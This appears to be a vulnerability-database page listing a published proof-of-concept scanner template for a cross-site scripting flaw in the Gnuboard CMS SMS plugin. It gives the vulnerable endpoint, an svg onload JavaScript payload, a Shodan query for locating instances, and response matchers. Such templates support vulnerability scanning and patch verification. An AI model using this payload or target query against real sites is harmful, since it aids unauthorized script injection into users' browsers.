gnuboard-sms-xss: Gnuboard CMS - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Gnuboard CMS | POC: 已公开

漏洞描述

Gnuboard CMS contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary JavaScript into the responses returned by the server.

PoC代码[已公开]

id: gnuboard-sms-xss

info:
  name: Gnuboard CMS - Cross-Site Scripting
  author: gy741
  severity: medium
  description: Gnuboard CMS contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary JavaScript into the responses returned by the server.
  reference:
    - https://sir.kr/g5_pds/4788?page=5
    - https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
    cpe: cpe:2.3:a:gnuboard:gnuboard5:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"Gnuboard"
    product: gnuboard5
    vendor: gnuboard
  tags: xss,gnuboard,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard<svg+onload=alert(document.domain)>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"0nuboard<svg onload=alert(document.domain)>"'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e33c2de781e0c0f95e43f10aff48b224f97b893a94ba2763f153a2a8bc37d849022100c757e963402d950c52e76b862d6b23fb0a74099223ba9629033714576ee3a68a:922c64590222798bb761d5b6d8e72950

相关漏洞推荐